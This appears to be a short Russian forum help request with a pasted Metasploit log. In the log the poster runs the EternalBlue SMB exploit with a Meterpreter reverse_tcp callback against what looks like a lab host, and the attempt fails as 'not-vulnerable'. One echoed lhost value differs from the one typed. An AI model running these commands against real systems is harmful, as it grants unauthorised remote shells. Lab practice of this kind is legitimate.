вот так делаю
что нетак непойму
Код:
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.144
rhost => 10.10.10.144
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.16.91
lhost => 10.10.15.91
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.16.91:4444
[*] 10.10.10.144:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.10.144:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.10.10.144:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.10.144:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >